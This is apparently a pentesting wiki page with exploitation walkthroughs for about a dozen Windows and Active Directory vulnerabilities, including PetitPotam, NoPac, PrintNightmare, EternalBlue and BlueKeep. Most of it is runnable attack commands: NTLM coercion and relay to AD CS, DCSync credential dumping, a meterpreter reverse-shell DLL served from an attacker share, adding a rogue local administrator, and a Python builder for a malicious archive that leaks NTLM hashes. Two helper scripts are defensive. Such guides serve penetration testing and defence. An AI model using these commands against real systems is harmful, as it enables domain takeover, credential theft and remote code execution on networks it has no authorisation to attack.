# Windows

## Index

<table><thead><tr><th width="278">Name</th><th>CVE</th><th>Exploit</th></tr></thead><tbody><tr><td><a href="#ntlm-hash-via-rar-zip">NTLM Hash via RAR/ZIP </a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24071">CVE-2025-24071</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054">CVE-2025-24054</a></td><td><a href="https://github.com/0x6rss/CVE-2025-24071_PoC">Exploit</a></td></tr><tr><td><a href="#kerberos-checksum-vulnerability">Kerberos Checksum Vulnerability</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-6324">CVE-2014-6324</a><br>MS14-068</td><td><a href="https://github.com/mubix/pykek/blob/master/ms14-068.py">Exploit</a>, <a href="https://github.com/fortra/impacket/blob/master/examples/goldenPac.py">Impacket-Exploit</a></td></tr><tr><td><a href="#printerbug-or-spoolsample">PrinterBug <em>or</em> SpoolSample</a></td><td>/</td><td><a href="https://github.com/NotMedic/NetNTLMtoSilverTicket">Exploit</a></td></tr><tr><td><a href="#petitpotam">PetitPotam</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-36942">CVE-2021-36942</a></td><td><a href="https://github.com/topotam/PetitPotam">Exploit</a></td></tr><tr><td><a href="#samaccountname-spoofing">SamAccountName Spoofing - NoPac</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42278">CVE-2021-42278</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42287">CVE-2021-42287</a></td><td><a href="https://github.com/Ridter/noPac">Exploit</a></td></tr><tr><td><a href="#printnightmare">PrintNightmare</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-1675">CVE-2021-1675</a><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34527">CVE-2021-34527</a></td><td><a href="https://github.com/cube0x0/CVE-2021-1675">Exploit-1</a>, <a href="https://github.com/calebstewart/CVE-2021-1675">Exploit-2</a></td></tr><tr><td><a href="#windows-kernel-elevation-of-privilege-vulnerability">Windows Kernel Elevation of Privilege Vulnerability</a></td><td><a 
href="https://nvd.nist.gov/vuln/detail/CVE-2020-0668">CVE-2020-0668</a></td><td><a href="https://github.com/RedCursorSecurityConsulting/CVE-2020-0668">Exploit</a></td></tr><tr><td><a href="#windows-certificate-dialog-elevation-of-privilege-vulnerability">Windows Certificate Dialog Elevation of Privilege Vulnerability</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1388">CVE-2019-1388</a></td><td><a href="https://packetstormsecurity.com/files/14437/hhupd.exe.html">hhupd.exe</a></td></tr><tr><td><a href="#secondary-logon-elevation-of-privilege-vulnerability">Secondary Logon Elevation of Privilege Vulnerability</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2016-0099">CVE-2016-0099</a><br>MS16-032</td><td><a href="https://www.exploit-db.com/exploits/39719">Exploit</a></td></tr><tr><td><a href="#eternalblue">EternalBlue</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0144">CVE-2017-0144</a><br>MS17-010</td><td><a href="https://www.exploit-db.com/exploits/42315">Exploit</a></td></tr><tr><td><a href="#bluekeep">BlueKeep</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0708">CVE-2019-0708</a></td><td><a href="https://github.com/RICSecLab/CVE-2019-0708">Exploit</a></td></tr></tbody></table>

### NTLM Hash via RAR/ZIP

Windows Explorer automatically opens an outbound SMB connection, and with it NTLM authentication, when a `.library-ms` file is extracted from a RAR or ZIP archive and the library definition inside it points at a UNC path (`\\attacker\share`). The user does not need to open or execute the file; extracting the archive with Explorer is enough for the victim machine to send its NetNTLMv2 challenge-response (loosely called the "NTLM hash") to the attacker's server, where it can be cracked offline or relayed. CVE-2025-24054 is the closely related NTLM hash disclosure issue in the same `.library-ms` handling.

[Exploit](https://github.com/0x6rss/CVE-2025-24071_PoC)

{% code overflow="wrap" %}

```bash
python3 poc.py
# > enter file name: <FILENAME.zip>
# > enter IP: <MY_IP>
```

{% endcode %}

Once the archive has been created, start [responder](https://github.com/lgandx/Responder) on the interface facing the target, then deliver the archive to the victim (upload it to the vulnerable application, drop it on a share, or mail it). When the victim extracts it with Explorer, the machine authenticates to Responder, which logs the NetNTLMv2 response in a format hashcat mode 5600 accepts.
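As an added example that is not the linked PoC's code, the Python below builds the same kind of archive the PoC emits (a ZIP holding one `.library-ms` whose search connector points at our UNC path) and adds a defender-side check that lists and flags the UNC targets found inside a ZIP, which is what a mail gateway or upload handler should look for. The listener address `10.10.14.5` and the share name are placeholders; the element names follow the public Windows Library Description schema.

```python
import io
import zipfile
from typing import List
from xml.etree import ElementTree as ET

# Namespace of the Windows Library Description (.library-ms) format.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def build_library_ms(unc_path: str) -> bytes:
    """Return a .library-ms document whose search connector points at unc_path.

    Explorer resolves <simpleLocation><url> when it renders the extracted
    library, so a UNC path to a host we control makes the victim open an SMB
    session to us and authenticate with NTLM without any click on the file.
    """
    root = ET.Element("libraryDescription", {"xmlns": LIBRARY_NS})
    connector_list = ET.SubElement(root, "searchConnectorDescriptionList")
    connector = ET.SubElement(connector_list, "searchConnectorDescription")
    location = ET.SubElement(connector, "simpleLocation")
    # ElementTree escapes the text, so a host name containing '&' cannot break the XML.
    ET.SubElement(location, "url").text = unc_path
    body = ET.tostring(root, encoding="unicode")
    return ('<?xml version="1.0" encoding="UTF-8"?>\n' + body).encode("utf-8")


def build_archive(unc_path: str, inner_name: str = "Documents.library-ms") -> bytes:
    """Return ZIP bytes holding a single .library-ms entry, the artefact the PoC writes to disk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, build_library_ms(unc_path))
    return buf.getvalue()


def library_urls_in_archive(archive: bytes) -> List[str]:
    """Defender-side check: every <url> found in .library-ms entries of a ZIP."""
    urls: List[str] = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            # Strip the namespace so the check works whatever prefix the author used.
            urls.extend(el.text or "" for el in root.iter() if el.tag.split("}")[-1] == "url")
    return urls


def external_unc_targets(urls: List[str], allowed_hosts: List[str]) -> List[str]:
    """Return the UNC urls whose host is not an approved internal file server.

    An archive for which this list is non-empty is exactly the artefact this
    CVE relies on and can be rejected at the gateway.
    """
    allowed = {h.lower() for h in allowed_hosts}
    flagged = []
    for url in urls:
        if url.startswith("\\\\"):
            host = url[2:].split("\\", 1)[0].lower()
            if host not in allowed:
                flagged.append(url)
    return flagged


if __name__ == "__main__":
    # Placeholder listener address and share name; point them at your Responder host.
    archive = build_archive("\\\\10.10.14.5\\share")
    with open("poc.zip", "wb") as fh:
        fh.write(archive)
    print(library_urls_in_archive(archive))
```

The same `library_urls_in_archive` function can be run over attachments in a mail pipeline; anything it returns that is not an internal file server is a coercion attempt, whatever the archive is called.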

### Kerberos Checksum Vulnerability

This was a flaw in the Microsoft KDC's validation of the Privilege Attribute Certificate (PAC), which could be leveraged with standard domain user credentials to elevate privileges to Domain Admin. A Kerberos ticket carries information about the user, including account name, ID and group membership, in the PAC, which the KDC signs with secret keys so that it cannot be tampered with after creation. Unpatched KDCs, however, accepted PAC signatures made with checksum types that need no key (such as MD5), so a client could forge a PAC claiming membership of Domain Admins or another privileged group and have the KDC accept it as legitimate. Only Domain Controllers without the MS14-068 update (Windows Server 2003 through 2012 R2) are affected. For more info see [HERE](https://legacy.thehacker.recipes/a-d/movement/kerberos/forged-tickets/ms14-068).

[Exploit](https://github.com/mubix/pykek/blob/master/ms14-068.py) (pykek) forges the PAC and obtains a TGT; it writes `TGT_<user>@<domain>.ccache` to the current directory, which you can then use with `KRB5CCNAME` and any impacket tool supporting `-k`

{% code overflow="wrap" %}

```bash
# with a plaintext password
ms14-068.py -u '<BASICUSER>'@'<DOMAIN_FQDN>' -p '<PASSWORD>' -s '<BASICUSER_SID>' -d '<DOMAIN_CONTROLLER>'
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# with pass-the-hash
ms14-068.py -u '<BASICUSER>'@'<DOMAIN_FQDN>' --rc4 '<NThash>' -s '<BASICUSER_SID>' -d '<DOMAIN_CONTROLLER>'
```

{% endcode %}

[Impacket-Exploit](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) (goldenPac.py) does the whole chain in one step: it requests a TGT, forges a PAC granting Domain Admin membership, and uses the resulting ticket to open a PsExec session on the DC

{% code overflow="wrap" %}

```bash
goldenPac.py <DOMAIN_FQDN>/<USER>:<PASS>@<DC_FQDN> -dc-ip <DC_IP>
```

{% endcode %}

[Metasploit](/rednote/utility/c2-and-exploitation-framework/metasploit.md)

```
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
```

### PrinterBug *or* SpoolSample

The Printer Bug is a flaw in the MS-RPRN protocol (Print System Remote Protocol), which defines the communication between a client and a print server for print job processing and print system management. Any domain user can connect to the spooler's named pipe (`\pipe\spoolss`), open a handle with `RpcOpenPrinter`, and call `RpcRemoteFindFirstPrinterChangeNotificationEx`, which makes the server authenticate over SMB to any host the client supplies. The spooler service runs as SYSTEM and is installed and running by default on Windows servers with Desktop Experience, Domain Controllers included. Because the coerced authentication comes from the machine account, its NetNTLM response is not practically crackable; the value of the bug lies in relaying it (to AD CS, or to LDAP where signing is not enforced) or in pointing a DC at a host with unconstrained delegation to capture the DC's TGT.

Set [responder](https://github.com/lgandx/Responder)

{% code overflow="wrap" %}

```bash
sudo responder -I <INTERFACE>
```

{% endcode %}

Using PowerShell, get a list of Windows boxes (servers are usually priority)

{% code overflow="wrap" %}

```powershell
# -notlike needs wildcards, otherwise the clause is a no-op; drop it to include Server 2016
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties OperatingSystem | Select-Object -ExpandProperty Name | Out-File servers.txt
```

{% endcode %}

{% tabs %}
{% tab title="Linux (Remotely)" %}
With [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) see if the Spooler Service is listening

{% code overflow="wrap" %}

```bash
rpcdump.py <DOMAIN>/<USER>:<PASS>@<SERVER.DOMAIN.COM> | grep MS-RPRN
```

{% endcode %}

Now, with [dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py), ask the service to authenticate against an arbitrary host

{% code overflow="wrap" %}

```bash
python dementor.py -d <DOMAIN> -u <USER> -p <PASS> <RESPONDER_IP> <TARGET>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
printerbug.py '<DOMAIN>/<USER>:<PASS>'@<TARGET> <RESPONDER_IP>
```

{% endcode %}
{% endtab %}

{% tab title="Windows (Locally)" %}
With `Get-SpoolStatus.ps1` (the [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) check bundled in the NetNTLMtoSilverTicket repo) see if the Spooler Service is listening

{% code overflow="wrap" %}

```powershell
. .\Get-SpoolStatus.ps1
Get-Content servers.txt | ForEach-Object { Get-SpoolStatus -ComputerName $_ }
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-SpoolStatus -ComputerName <SERVER.DOMAIN.COM>
```

{% endcode %}

Now, with [SpoolSample](https://github.com/NotMedic/NetNTLMtoSilverTicket), ask the service to authenticate against an arbitrary host

{% code overflow="wrap" %}

```powershell
SpoolSample.exe <TARGET> <RESPONDER_IP>
```

{% endcode %}
{% endtab %}
{% endtabs %}

### PetitPotam

PetitPotam coerces a Domain Controller into authenticating to an attacker-chosen host by calling Encrypting File System Remote Protocol (MS-EFSRPC) methods such as `EfsRpcOpenFileRaw` over the `\pipe\lsarpc` named pipe (Local Security Authority Remote Protocol, port 445); the DC then connects to the supplied UNC path and authenticates with its machine account over NTLM. Originally this worked without credentials; CVE-2021-36942 closed the unauthenticated path, while the coercion still works with any valid domain account on many systems. Relayed to an Active Directory Certificate Services (AD CS) Web Enrollment endpoint that accepts NTLM over HTTP without Extended Protection for Authentication (the ESC8 scenario), the DC's authentication yields a certificate for the DC machine account, which is enough to take over the domain. For more info, see [this](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) link.

Use [certi](https://github.com/zer1t0/certi) to attempt to locate the Web Enrollment URL for the CA host.

{% code overflow="wrap" %}

```bash
certi find -dc-ip <DC> -u <USER> -p <PASS> -d <DOMAIN>
```

{% endcode %}

Start [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py), pointing it at the CA's Web Enrollment endpoint (`/certsrv/certfnsh.asp`) with the `--adcs` module and a template that a Domain Controller can enroll in: `DomainController` or `KerberosAuthentication` (for an ordinary workstation you would use `Machine`).

{% code overflow="wrap" %}

```bash
sudo ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController
```

{% endcode %}

Attempt to coerce the Domain Controller to authenticate to our ntlmrelayx

{% tabs %}
{% tab title="PetitPotam" %}
Use [PetitPotam.py](https://github.com/topotam/PetitPotam)

{% code overflow="wrap" %}

```bash
python3 PetitPotam.py <MyIP> <DC>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
python3 PetitPotam.py [-d <DOMAIN> -u <USER> -p <PASS>] <MyIP> <DC>
```

{% endcode %}

Or, if initial access has been established to a domain joined system, use [PetitPotam.exe](https://github.com/topotam/PetitPotam)

{% code overflow="wrap" %}

```powershell
PetitPotam.exe <MyIP> <DC>
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
Use EFS module in [Mimikatz](https://github.com/gentilkiwi/mimikatz).

{% code overflow="wrap" %}

```
misc::efs /server:<Domain Controller> /connect:<ATTACK HOST>
```

{% endcode %}
{% endtab %}

{% tab title="PowerShell" %}
Use PowerShell implementation of the tool [Invoke-PetitPotam.ps1](https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Petitpotam.ps1).
{% endtab %}
{% endtabs %}

Obtain the User and the Base64 encoded certificate for the Domain Controller from ntlmrelayx.

Use [gettgtpkinit.py](https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py) to request a TGT for the Domain Controller's machine account via PKINIT, authenticating with the relayed certificate.

{% code overflow="wrap" %}

```bash
python3 gettgtpkinit.py -dc-ip <DC_IP> -pfx-base64 <BASE64> <DOMAIN>/<DC_NAME>\$ <OUT_NAME>.ccache
# note the "AS-REP encryption key" it prints; getnthash.py needs it
```

{% endcode %}

Set the `KRB5CCNAME` environment variable, so our attack host uses this file for Kerberos authentication attempts

```bash
export KRB5CCNAME=<OUT_NAME>.ccache
```

With `klist` (from the [krb5-user](https://packages.ubuntu.com/focal/krb5-user) package) confirm the cache holds a TGT whose default principal is the DC's machine account.

Now we can use the TGT to perform various attacks

{% tabs %}
{% tab title="DCSync" %}
Then use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) to perform DCSync (the DC machine account has replication rights)

{% code overflow="wrap" %}

```bash
# with -k the target must be the DC's hostname (the SPN is built from it), not its IP
secretsdump.py -just-dc-user <DOMAIN>/administrator -k -no-pass '<DOMAIN>/<DC_NAME>$'@<DC_FQDN>
```

{% endcode %}
{% endtab %}

{% tab title="getnthash" %}
Then use [getnthash.py](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py) from PKINITtools to request the NT hash

{% code overflow="wrap" %}

```bash
python3 /opt/PKINITtools/getnthash.py -key <KEY> -dc-ip <DC_IP> <DOMAIN>/<DC_NAME>\$
```

{% endcode %}
{% endtab %}
{% endtabs %}

Alternatively, once we obtain the base64 certificate via ntlmrelayx, we can use it with [Rubeus](https://github.com/GhostPack/Rubeus) on a **Windows attack host** to request a TGT for the DC machine account and inject it into the current session (pass-the-ticket) in one step.

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /user:<DC_NAME>$ /certificate:<BASE64> /ptt
```

{% endcode %}

### SamAccountName Spoofing - NoPac

[CVE-2021-42278](https://nvd.nist.gov/vuln/detail/CVE-2021-42278) is a `sAMAccountName` spoofing flaw: Active Directory did not enforce that computer account names end with `$`, so a computer account could be renamed to match a Domain Controller's name.\
[CVE-2021-42287](https://nvd.nist.gov/vuln/detail/CVE-2021-42287) is a flaw in Kerberos Privilege Attribute Certificate (PAC) handling in AD DS: when the KDC cannot find the account named in a TGT, it appends `$` and retries, so a ticket issued to `DC01` is treated as belonging to `DC01$`.

Chained, the attack works as follows. By default any authenticated user can join up to 10 machines to the domain (`ms-DS-MachineAccountQuota`). We create a computer account, rename its `sAMAccountName` to the DC's name without the trailing `$`, request a TGT for it, then rename the account back. When we present that TGT in an S4U2self request for a service ticket, the KDC no longer finds the principal, appends `$`, and issues a ticket for the real DC machine account carrying the PAC of the user we chose to impersonate (e.g. the built-in Administrator). That gives us SYSTEM-level access to the Domain Controller. Only DCs without the November 2021 updates are affected.

Install [impacket](https://github.com/fortra/impacket)

{% code overflow="wrap" %}

```bash
git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m pip install .
```

{% endcode %}

Use [NoPac](https://github.com/Ridter/noPac)

Check if the system is vulnerable

{% code overflow="wrap" %}

```bash
sudo python3 scanner.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -use-ldap
# we need ms-DS-MachineAccountQuota > 0 to be able to add a machine account
```

{% endcode %}

Attack the target. (**This could be "noisy" or may be blocked by AV or EDR**)

Impersonate the built-in administrator account and drop into a semi-interactive shell session (`smbexec.py`) on the target Domain Controller.

{% code overflow="wrap" %}

```bash
sudo python3 noPac.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> -shell --impersonate administrator -use-ldap
# noPac.py also saves the impersonated user's ticket (ccache) in the current directory
```

{% endcode %}

We could then use the TGT ccache file to perform a [Pass-The-Ticket](/rednote/pentesting-process/active-directory/pass-the-ticket.md) and perform further attacks such as [DCSync](/rednote/pentesting-process/active-directory/dc-synchronization.md). We can also use the tool with the `-dump` flag to perform a DCSync using secretsdump.py.

{% code overflow="wrap" %}

```bash
sudo python3 noPac.py <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user <DOMAIN>/administrator
```

{% endcode %}

### PrintNightmare

{% tabs %}
{% tab title="Remotely" %}
[Exploit-1](https://github.com/cube0x0/CVE-2021-1675) makes the spooler (running as SYSTEM) load a DLL from a share we host, giving us code execution as SYSTEM on the target.

Install cube0x0's fork of Impacket, which adds the MS-RPRN/MS-PAR structures the exploit imports (it replaces the mainline package)

{% code overflow="wrap" %}

```bash
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install  
```

{% endcode %}

We can use `rpcdump.py` to see if "*Print System Asynchronous Protocol*" and "*Print System Remote Protocol*" are exposed on the target.

{% code overflow="wrap" %}

```bash
rpcdump.py @<IP> | grep -E 'MS-RPRN|MS-PAR'
```

{% endcode %}
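The same rpcdump check appears in the PrinterBug section above. As an added example that is not part of impacket or of either exploit, the Python below parses saved `rpcdump.py` output (a constructed sample is embedded; the host name, IP and ports are placeholders) and reports only the print interfaces that are reachable over the network, matching on the interface UUIDs rather than the description text, and dropping `ncalrpc` bindings, which are local-only and of no use for coercion or remote exploitation.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Interface UUIDs registered by the spooler, as published in the MS-RPRN and
# MS-PAR specifications.
PRINT_INTERFACES = {
    "12345678-1234-abcd-ef00-0123456789ab": "MS-RPRN",  # Print System Remote Protocol
    "76f03f96-cdfd-44fc-a22c-64950a001209": "MS-PAR",   # Print System Asynchronous Remote Protocol
}

UUID_RE = re.compile(r"UUID\s*:\s*([0-9A-Fa-f-]{36})")
PROTOCOL_RE = re.compile(r"\[(MS-[A-Z0-9]+)\]")

# Constructed sample in the layout rpcdump.py prints; host, IP and ports are
# placeholders, not output captured from a real target.
SAMPLE_RPCDUMP = """\
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol 
Provider: services.exe 
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.10[49664]

Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.10[49668]
          ncacn_np:\\\\SRV01[\\pipe\\spoolss]
          ncalrpc:[LRPC-a1b2c3d4e5f6]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Provider: spoolsv.exe 
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.10[49668]
          ncalrpc:[LRPC-a1b2c3d4e5f6]
"""


class Endpoint(NamedTuple):
    uuid: str
    protocol: Optional[str]
    bindings: List[str]


def parse_rpcdump(text: str) -> List[Endpoint]:
    """Split rpcdump.py output (records separated by blank lines) into Endpoint tuples."""
    records: List[Endpoint] = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        uuid_match = UUID_RE.search(chunk)
        if not uuid_match:
            continue
        proto_match = PROTOCOL_RE.search(chunk)
        bindings: List[str] = []
        in_bindings = False
        for line in chunk.splitlines():
            if line.startswith("Bindings:"):
                in_bindings = True
            elif in_bindings and line.strip():
                bindings.append(line.strip())
        records.append(Endpoint(
            uuid=uuid_match.group(1).lower(),
            protocol=proto_match.group(1) if proto_match else None,
            bindings=bindings,
        ))
    return records


def remote_print_endpoints(text: str) -> Dict[str, List[str]]:
    """Map MS-RPRN / MS-PAR to the bindings reachable from another host.

    Only ncacn_np (SMB named pipe) and ncacn_ip_tcp bindings can be hit over
    the network; an interface advertised with ncalrpc alone is local-only.
    """
    found: Dict[str, List[str]] = {}
    for rec in parse_rpcdump(text):
        name = PRINT_INTERFACES.get(rec.uuid)
        if name is None:
            continue
        remote = [b for b in rec.bindings if b.startswith(("ncacn_np:", "ncacn_ip_tcp:"))]
        if remote:
            found[name] = remote
    return found


def spooler_exposed(text: str) -> bool:
    """True when a print interface is remotely reachable: a PrinterBug / PrintNightmare candidate."""
    return bool(remote_print_endpoints(text))


if __name__ == "__main__":
    # Live use: rpcdump.py DOMAIN/USER:PASS@HOST > host.txt, then pass that file's text here.
    for name, bindings in remote_print_endpoints(SAMPLE_RPCDUMP).items():
        print(name, "->", ", ".join(bindings))
```

Matching on UUIDs also keeps the check working when the endpoint mapper does not know the friendly protocol name and prints only the UUID line.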

After confirming this, we craft a DLL payload using [msfvenom](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom)

{% code overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=<MyPort> -f dll > backupscript.dll
```

{% endcode %}

We will then host this payload in an [SMB share](/rednote/utility/server.md#smb)

{% code overflow="wrap" %}

```bash
# the share path is a directory; the exploit will fetch \\<MY_IP>\<NAME_SHARE>\backupscript.dll from it
sudo smbserver.py -smb2support <NAME_SHARE> /path/to/dir/
```

{% endcode %}

Configure and start a Metasploit `multi/handler` matching the payload. With the share hosting our DLL and the handler listening for a connection, run the exploit against the target.

{% code overflow="wrap" %}

```bash
sudo python3 CVE-2021-1675.py <DOMAIN>/<USER>:<PASS>@<TARGET_IP> '\\<MY_IP>\<NAME_SHARE>\backupscript.dll'
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}
[Exploit-2](https://github.com/calebstewart/CVE-2021-1675) is a PowerShell implementation for local privilege escalation: it abuses the same driver-installation path on the local spooler to add a new local administrator, so it needs no remote share or payload.

Check if the Spooler service is running

{% code overflow="wrap" %}

```powershell
ls \\localhost\pipe\spoolss
```

{% endcode %}

Run the exploit; by default it creates the local user given in `-NewUser` and adds it to the local Administrators group

{% code overflow="wrap" %}

```powershell
Import-Module .\CVE-2021-1675.ps1 
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Windows Kernel Elevation of Privilege Vulnerability

[Exploit](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668): CVE-2020-0668 is an arbitrary file move performed by the Windows Service Tracing feature as SYSTEM. On its own it only places a file; to turn it into code execution, pair it with a DLL-hijack primitive such as [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [diaghub](https://github.com/xct/diaghub), or overwrite the binary of a service that runs as SYSTEM and can be started by unprivileged users (check the service's DACL with `sc sdshow` or accesschk).

ex: `<PATH>` = `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe` (service name `MozillaMaintenance`, which standard users may start)

Check the current permissions on the target binary with `icacls <PATH>` (our user should have no write access yet).\
Prepare two copies of the payload, both renamed to the service executable's name.

Run the exploit, which moves the first copy onto the service binary

```powershell
.\CVE-2020-0668.exe <MaliciousExe1> <PATH>
```

Check the permissions again with `icacls <PATH>`: our user now has Full control (`F`) over the file.

The copy that was moved is no longer a valid executable, but since we now control the path, overwrite it with the second, clean copy

```powershell
copy /Y <MaliciousExe2> <PATH>
```

Now start the service so the payload runs as SYSTEM (use the service name, not the executable name)

```powershell
net start <SERVICE_NAME>
```

### Windows Certificate Dialog Elevation of Privilege Vulnerability

Use [hhupd.exe](https://packetstormsecurity.com/files/14437/hhupd.exe.html), an old Microsoft-signed installer whose certificate carries an `SpcSpAgencyInfo` field populated with a hyperlink. The UAC consent prompt runs as SYSTEM, so when it shows the publisher's certificate and we click that link, the default browser is launched in the SYSTEM context. Fixed by the November 2019 updates (CVE-2019-1388).

`Right click on hhupd.exe` > `Run as administrator`\
\> on the UAC prompt, `Show information about the publisher's certificate` > `General` tab > click the `Issued by` link, then close the certificate and UAC dialogs

A browser window is now open as SYSTEM (verify the browser process owner in Task Manager).

`Right click in the browser` > `Save as` > in the file-name box type `c:\windows\system32\cmd.exe` and press Enter (or browse to `C:\Windows\System32`, set the file type to `All Files`, right-click `cmd.exe` > `Open`) to get a SYSTEM command prompt.

### Secondary Logon Elevation of Privilege Vulnerability

[Exploit](https://www.exploit-db.com/exploits/39719): Invoke-MS16-032 exploits a race condition in the Secondary Logon service (seclogon) handle handling to spawn a `cmd.exe` running as SYSTEM. Because it is a race, a run may fail and need repeating. Affects unpatched Windows 7 through Windows 10 and Server 2008 through 2012 R2 (fixed by MS16-032, March 2016).

```powershell
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032   # opens a new cmd.exe window running as NT AUTHORITY\SYSTEM
```

### EternalBlue

SMBv1 vulnerability (MS17-010). [Exploit](https://www.exploit-db.com/exploits/42315) 42315 is sleepya's Python 2 exploit for Windows 7 / Server 2008 R2; it needs `mysmb.py` from the same author next to it, a username/password (or a null/guest session) set in the script, and its own payload in `smb_pwn()`, since the stock one is only a proof of concept. Confirm the target is unpatched first, for example with nmap's `smb-vuln-ms17-010` script, because a failed attempt can crash the host.

```bash
# Python 2 only; edit USERNAME/PASSWORD and smb_pwn() in the script before running
python2 42315.py <TARGET_IP> [<PIPE_NAME>]
```

### BlueKeep

RDP vulnerability (pre-authentication use-after-free in the RDP kernel driver, CVE-2019-0708), [Exploit](https://github.com/RICSecLab/CVE-2019-0708). Exploitation relies on kernel pool grooming and can blue-screen the target, so check the host with a non-destructive scanner before firing it. Start the listener first; the payload connects back to it.

```bash
nc -v -l 4444                                          # catches the reverse shell
python3 exploit.py <TARGET> -rp <PORT_RDP_SERVER> <MY_IP>
```
```

